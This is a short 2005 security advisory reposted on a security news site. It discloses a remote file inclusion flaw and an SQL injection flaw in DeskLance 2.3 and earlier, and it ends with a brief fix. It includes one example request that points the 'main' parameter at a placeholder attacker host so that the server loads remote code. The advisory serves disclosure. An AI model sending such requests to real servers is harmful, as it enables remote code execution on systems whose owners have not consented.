Computer Security

Security Advisory: DeskLance Vuln.
back  news / advisories / forum / software / advertising / search / exploits  forward
[EN] securityvulns.ru
no-pyccku



Related information

  Web applications security vulnerabilities (PHP, ASP, CGI, Perl, etc)

  XSS in PBLang 4.65 Profile.php/UCP.php

  [SA17706] PHP-Post Cross-Site Scripting and Script Insertion Vulnerabilities

  [SA17741] blogBuddies Cross-Site Scripting Vulnerabilities

  [SA17736] SmartPPC Pro "username" Cross-Site Scripting Vulnerability

From:r0t <krustevs_(at)_googlemail.com>
Date:24.11.2005
Subject:DeskLance Vuln.

DeskLance Vuln.
Vuln. dicovered by : r0t
Date: 24 nov. 2005
Orginal advsiory:http://pridels.blogspot.com/2005/11/desklance-vuln.html
Vendor:http://www.desklance.com/
affected version: 2.3 and prior

Vuln. description:
Input passed to the "main" parameter in "index.php" isn't properly
verified, before it is used to include files. This can be exploited to
include arbitrary files from external and local resources.
example:
/support/index.php?main=http://attackerhost/file

aslo "announce" variable isn't properly sanitised before being used in
a SQL query.It gives it gives to attacker full path and can be
exploited  by injecting arbitrary SQL code


Solution:
Edit the source code to ensure that input is properly sanitised.
About | Terms of use | Privacy Policy
© SecurityVulns, 3APA3A, Vladimir Dubrovin
Nizhny Novgorod

 
 


Rating@Mail.ru